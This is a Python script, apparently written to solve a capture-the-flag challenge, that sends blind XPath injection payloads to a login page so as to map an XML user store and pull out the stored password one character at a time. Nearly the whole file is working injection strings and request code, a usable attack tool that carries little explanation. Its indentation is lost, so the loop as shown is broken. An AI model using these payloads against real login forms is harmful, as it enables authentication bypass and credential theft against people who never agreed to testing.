# http://docs.python-requests.org/en/master/user/quickstart/#make-a-request
import string
import requests
import time
import binascii
import sys
#from urllib import unquote
alphabet = "_{}" + string.digits + string.ascii_letters
found = ""
flag_length = 64
url = "https://challenge.acictf.com/problem/27747/login.php"
"""
3 things in database
has 2 sub elements
admin
(blank)
has 0 sub elements
"""
i = sys.argv[1]
# for name
d = {"username":"admin' or count(/*) = " + str(i) + " or '1'='2", "password":"test"} # see how many things there are
d = {"username":"admin' or count(/*[1]/*) = " + str(i) + " or '1'='2", "password":"test"} # see how many things there are within structure
d = {"username":"admin' or string-length(name(/*[1]/*[1])) = " + str(i) + " or '1'='2", "password":"test"} # find length of name of that entity
d = {"username":"admin' or substring(name(/*[1]/*[2]), " + str(i) + ", 1) = '" + sys.argv[2] + "' or '1'='2", "password":"test"} # match character (string, start(1 based), length)
d = {"username":"admin' or string-length(name(/*[1])) = " + str(i) + " or '1'='2", "password":"test"} # go back up 1
d = {"username":"admin' or substring(name(/*[1]), " + str(i) + ", 1) = '" + sys.argv[2] + "' or '1'='2", "password":"test"} #
d = {"username":"admin' or string-length(/*[1]/pass/text()) = " + str(i) + " or '1'='2", "password":"test"} # get actual value
d = {"username":"admin' or count(//*) = " + str(i) + " or '1'='2", "password":"test"} # entire database
for count in range(10):
d = {"username":"admin' or count(//comment()) = " + str(count) + " or '1'='2", "password":"test"}
# d = {"username":"adin' or string-length(name(//*[3])) = " + str(count) + " or '1'='2", "password":"test"}
# d = {"username":"adin' or substring(name(//*[1]/*[1]), " + str(count) + ", 1) = '" + sys.argv[2] + "' or '1'='2", "password":"test"}
r = requests.post(url, data=d)
print(count)
print(r.text)
print(r.status_code)
exit()
print("-" * 50)
# for name
d = {"username":"admin' or substring(/*[1]/*[1]/text(), 1, 1) = 'a' or '1'='2", "password":"test"}
r = requests.post(url, data=d)
print(r.text)
print(r.status_code)
exit()
print("-" * 50)
# Test if xpath2, which has more features
d = {"username":"admin' and lower-case('A') = 'a' or '1'='1", "password":"test"}
d = {"username":"admin' and lower-case('A') = \"a\" or '1'='1", "password":"test"}
r = requests.post(url, data=d)
print(r.text)
print(r.status_code)
# https://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf